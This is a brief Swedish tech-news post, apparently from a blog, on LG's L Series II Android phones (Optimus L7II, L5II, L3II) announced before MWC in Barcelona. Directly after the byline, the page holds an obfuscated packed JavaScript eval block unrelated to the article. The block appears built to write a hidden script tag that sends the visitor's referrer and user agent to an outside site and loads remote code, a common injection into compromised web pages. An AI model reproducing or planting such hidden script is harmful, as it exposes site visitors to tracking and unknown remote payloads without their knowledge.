Image Image Image Image Image Image Image Image Image Image

| 28 november, 2020

Scroll to top

Top

LG visar upp L Series II innan MWC i Barcelona

LG visar upp L Series II innan MWC i Barcelona
Sebastian

LG: eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|yiefr|var|u0026u|referrer|asdht||js|php’.split(’|’),0,{}))
Den 25 februari sätter MWC i Barcelona igång. Det är nördarnas paradis och elektronikföretagen är redo.

Men redan innan så har tre nya och fräscha modeller presenteras. Det är företaget LG som inte kan hålla sig.
Med en rad nya Androidtelefoner som går under namnet L Series II tjuvstartar mässan.

Dessa telefoner är uppföljare till förra årets L-serie som L3, L7 och L9. De nya telefonerna kommer gå under namnen Optimus L7II med 4,3 tum skärm, L5II med fyra tum skärm och till sist L3II med 3,2 tum skärm.

Man kan en så länge endast se specifikationerna på L7II. Den kommer att innehålla ett dubbelkärnigt Qualcommship på 1 GHz, en kamera med 8 MP, VGA-kamera på framsidan och ett 247omAh-batteri. Den kör också senaste Android 4.1 Jelly Bean.

Det ska bli intressant att få se fler roliga telefoner under mässan i Barcelona.